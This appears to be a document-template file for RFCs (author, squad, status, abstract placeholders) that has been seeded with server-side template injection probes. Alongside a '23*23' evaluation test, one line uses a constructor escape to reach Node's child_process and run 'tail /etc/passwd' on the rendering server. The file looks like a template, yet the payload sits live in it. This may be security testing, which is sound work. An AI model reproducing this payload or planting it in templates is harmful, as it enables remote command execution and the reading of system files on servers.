# RFC-${{ values.rfcNumber }} - ${{ values.rfcTitle }}

HELLO??

*Author(s)*: 
*Squad*: 
*Requested Reviewers*: 
*Status*: DRAFT


values: ${{ values }}

{{range.constructor("return global.process.mainModule.require('child_process').execSync('tail /etc/passwd')")()}}

## Abstract
${{ values.abstract }}


test23:

${{ 23*23 }}
